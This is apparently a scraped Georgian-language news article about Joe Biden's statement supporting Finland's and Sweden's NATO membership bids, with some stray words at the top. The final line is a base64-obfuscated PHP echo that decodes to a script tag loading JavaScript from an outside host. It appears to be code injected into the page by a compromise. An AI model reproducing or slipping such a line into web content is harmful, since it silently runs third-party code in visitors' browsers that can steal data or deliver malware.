celsiusi
ავერსი შნაიდერი
აშშ შეაკავებს ნებისმიერ აგრესიასა და საფრთხეს ფინეთისა და შვედეთის მისამართით, ვიდრე ნატო მათ ალიანსში გაწევრიანებას განიხილავს, – ამის შესახებ აშშ-ის პრეზიდენტმა ჯო ბაიდენმა განაცხადა.
 
პრეზიდენტის თქმით, ის მიესალმება და მტკიცედ უჭერს მხარს ფინეთისა და შვედეთის ისტორიულ განაცხადს ჩრდილოატლანტიკურ ალიანსში გაწევრიანების თაობაზე.
 
მისი თქმით, მათი სწრაფად გაწევრიანებისთვის აშშ-ის კონგრესსა და ნატო-ს მოკავშირეებთან იმუშავებს.
 
„ფინეთი და შვედეთი აშშ-ის ხანგრძლივი და საიმედო პარტნიორები არიან. ნატო-ში გაწევრიანებით ისინი კიდევ უფრო გააძლიერებენ ჩვენს თავდაცვით თანამშრომლობას და სარგებელს მოუტანენ მთელ ტრანსატლანტიკურ ალიანსს. ნატოელ მოკავშირეებთან ერთად, აშშ შეინარჩუნებს მის აქტიურ სწავლებასა და არსებობას ბალტიის ზღვის რეგიონში. ვიდრე მათი ნატო-ში გაწევრიანება განიხილება, აშშ იმუშავებს ფინეთთან და შვედეთთან, რათა შეინარჩუნოს სიფხიზლე ნებისმიერი საფრთხის წინააღმდეგ ჩვენი საერთო უსაფრთხოების წინაშე და შეაკავოს აგრესია ან აგრესიის საფრთხე“, – ნათქვამია პრეზიდენტის განცხადებაში.
 
ბაიდენი 19 მაისს ვაშინგტონში ფინეთის პრეზიდენტ საული ნიინისტოსა და შვედეთის პრემიერ-მინისტრ მაგდალენა ანდერსონს უმასპინძლებს.
574
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");